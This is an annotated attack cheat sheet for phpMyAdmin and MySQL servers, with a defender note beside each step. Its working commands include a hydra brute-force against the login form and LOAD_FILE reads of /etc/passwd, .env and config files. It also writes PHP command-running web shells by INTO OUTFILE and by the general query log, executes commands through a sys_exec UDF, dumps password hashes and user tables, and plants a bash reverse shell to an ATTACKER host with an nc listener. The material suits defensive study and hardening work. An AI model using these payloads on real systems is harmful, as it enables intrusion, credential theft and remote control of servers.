# URL paths commonly probed for an exposed phpMyAdmin or other database admin front end.
# Defender note: one client requesting several of these in quick succession is a scanning
# signal; the admin UI should not be reachable from untrusted networks at all.
/phpmyadmin /phpMyAdmin /pma /dbadmin /mysql /admin /sql
# Default or weak credential pairs in user:password form ("<blank>" means an empty password).
# Defender note: none of these should authenticate. phpMyAdmin's AllowNoPassword setting
# decides whether its login form accepts an empty password.
root:<blank> root:root root:toor admin:admin mysql:mysql pma:pma
# Online password guessing against the phpMyAdmin login form: POSTs pma_username and
# pma_password to index.php and treats a response containing "Cannot log in" as a failed attempt.
# Defender note: this appears in web logs as a burst of login POSTs from one source; rate limiting,
# lockout, and an extra authentication layer in front of the UI all blunt it.
hydra -L users.txt -P passwords.txt TARGET http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:Cannot log in"
# Version string that the lookup below is keyed on.
phpMyAdmin 4.8.1
# Looks up published exploit entries matching "phpmyadmin 4.8".
# Defender note: compare the installed version against vendor advisories and keep it patched.
searchsploit phpmyadmin 4.8
-- Reads server-side files through the database: LOAD_FILE() returns the file's contents to the
-- SQL client, or NULL when the file cannot be read. The targets are an OS account list, a
-- Windows marker file, and application config files that commonly hold credentials.
-- Defender note: LOAD_FILE() needs the FILE privilege, a file readable by the mysqld OS account,
-- and a path allowed by secure_file_priv. Application and phpMyAdmin logins should not hold FILE.
SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('C:/Windows/win.ini'); SELECT LOAD_FILE('/var/www/html/config.php');
SELECT LOAD_FILE('/var/www/html/.env');
-- Shows the server's import/export restriction: an empty value means no restriction, a directory
-- limits file reads and writes to that directory, and NULL disables them.
-- Defender note: set this to NULL, or to a dedicated directory that is not web-served.
SHOW VARIABLES LIKE "secure_file_priv";
-- Writes a one-line PHP command runner into the web root with INTO OUTFILE; the next line of
-- the page requests that file over HTTP with a cmd parameter.
-- Defender note: the write is gated by FILE and secure_file_priv like the reads above, and it also
-- needs the mysqld OS account to have write access to the directory. INTO OUTFILE will not
-- overwrite an existing file. Keep the web root unwritable by the database service account and
-- alert on new .php files appearing there.
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
http://TARGET/shell.php?cmd=id
-- Windows/XAMPP variant of the web-root write: an HTML form wrapped around the same
-- system($_GET['cmd']) call, written to the XAMPP htdocs directory.
-- Defender note: the same controls apply (FILE privilege, secure_file_priv, directory permissions);
-- a database service that runs with high OS privileges widens what a written file can do.
SELECT "<HTML><BODY><FORM METHOD=\"GET\" NAME=\"f\"><INPUT TYPE=\"text\" NAME=\"cmd\"><INPUT TYPE=\"submit\"></FORM><pre><?php system($_GET['cmd']); ?></pre></BODY></HTML>" INTO OUTFILE 'C:\\xampp\\htdocs\\cmd.php';
-- Shows the server's data directory, which the mysqld OS account can always write to.
SHOW VARIABLES LIKE 'datadir';
-- Writes the same PHP one-liner into the data directory instead of the web root.
-- NOTE(review): a data directory is not normally served by a web server, and the page does not
-- show how this file would be reached. Unexpected non-database files under datadir are
-- themselves an indicator worth alerting on.
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/lib/mysql/shell.php';
-- Turns on the general query log and points it at a .php path in the web root, so the text of
-- the following SELECT, including its PHP tag, is written into that file by the server.
-- Defender note: secure_file_priv does not restrict general_log_file. The controls here are who
-- may run SET GLOBAL (a SUPER-level privilege), filesystem permissions on the web root, and
-- alerting on any runtime change to general_log or general_log_file.
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/log.php'; SELECT "<?php system($_GET['cmd']); ?>";
-- Lists which accounts hold the FILE and SUPER privileges that the statements above rely on.
-- Defender note: run the same query as an audit; only dedicated administrative accounts should
-- show 'Y' in either column.
SELECT user, file_priv, super_priv FROM mysql.user;
# Looks up published exploit entries matching "mysql udf" (user-defined function libraries).
searchsploit mysql udf
-- Registers a user-defined function from the shared library lib_mysqludf_sys.so and calls it
-- with an OS command, which runs as the mysqld OS account.
-- NOTE(review): the library must already be in the server's plugin directory; the page does not
-- show that step.
-- Defender note: keep plugin_dir unwritable by the mysqld account, restrict write access to the
-- mysql system schema, and alert on unexpected rows in mysql.func or new files in plugin_dir.
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id');
-- Dumps account names, hosts and password hashes from the grant table (authentication_string
-- is the hash column on current MySQL versions).
-- Defender note: SELECT on mysql.user should be limited to administrators; treat any exposure of
-- these hashes as a credential compromise and rotate.
SELECT user,host,authentication_string FROM mysql.user;
-- Same dump using the older "password" column name (presumably for older MySQL or MariaDB
-- servers; confirm against the server in scope).
SELECT user,password FROM mysql.user;
-- Enumerates databases, then reads every column of the WordPress user table, which includes
-- the stored password hashes and e-mail addresses.
-- Defender note: give each application its own least-privilege database account so that a
-- login to the admin UI does not expose every schema on the server.
SHOW DATABASES; USE wordpress; SHOW TABLES; SELECT * FROM wp_users;
-- Same INTO OUTFILE web-root write as the earlier example, but the PHP starts an interactive
-- bash session connected outbound to ATTACKER on TCP 4444.
-- Defender note: besides the file-write controls, egress filtering from the web server and
-- alerting on the web server process spawning a shell both catch this.
SELECT "<?php system('bash -c \"bash -i >& /dev/tcp/ATTACKER/4444 0>&1\"'); ?>" INTO OUTFILE '/var/www/html/rev.php';
# Listener on TCP 4444 that receives the outbound connection opened by the rev.php payload above.
# Defender note: the matching network signal is a web server host opening an outbound TCP
# connection to an unfamiliar address and port.
nc -lvnp 4444